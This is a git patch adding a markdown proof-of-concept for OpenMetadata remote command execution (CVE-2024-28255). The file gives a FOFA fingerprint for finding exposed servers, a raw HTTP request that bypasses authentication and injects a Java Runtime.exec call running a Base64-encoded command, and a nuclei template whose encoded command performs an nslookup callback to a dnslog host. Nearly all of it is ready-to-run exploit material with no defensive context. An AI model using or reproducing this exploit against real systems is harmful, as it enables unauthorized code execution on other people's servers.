From 3bb0519b02b3cbb525012c319bc4b896c845184f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 14 Apr 2024 19:22:08 +0800
Subject: [PATCH] =?UTF-8?q?Create=20OpenMetadata=E5=91=BD=E4=BB=A4?= =?UTF-8?q?=E6=89=A7=E8=A1=8C(CVE-2024-28255).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
OpenMetadata命令执行(CVE-2024-28255).md | 53 +++++++++++++++++++++++++
1 file changed, 53 insertions(+)
create mode 100644 OpenMetadata命令执行(CVE-2024-28255).md
diff --git a/OpenMetadata命令执行(CVE-2024-28255).md b/OpenMetadata命令执行(CVE-2024-28255).md
new file mode 100644
index 0000000..108690b
--- /dev/null
+++ b/OpenMetadata命令执行(CVE-2024-28255).md
@@ -0,0 +1,53 @@
+## OpenMetadata命令执行(CVE-2024-28255)
+
+## fofa
+```
+icon_hash="733091897"
+```
+
+## poc
+```
+GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码命令%22))) HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Connection: close
+Accept-Encoding: gzip
+```
+
+![78d091e4fbeaf6007c6605c09ff4025d](https://github.com/wy876/POC/assets/139549762/977f9bcb-c7f7-4a73-9918-9c06844c1436)
+
+
+## nuclei POC
+```
+id: CVE-2024-28255
+
+info:
+ name: CVE-2024-28255
+ author: xiaoming
+ severity: high
+ description: OpenMetadata Command Execution
+ metadata:
+ max-request: 1
+ shodan-query: ""
+ verified: true
+
+http:
+- raw:
+ - |+
+ GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgdGVzdC5kbnNsb2cuY24=%22))) HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+ Connection: close
+ Accept-Encoding: gzip
+
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - id: 1
+ type: word
+ part: body
+ words:
+ - "400"
+ - java.lang.ProcessImpl
+ condition: and
+```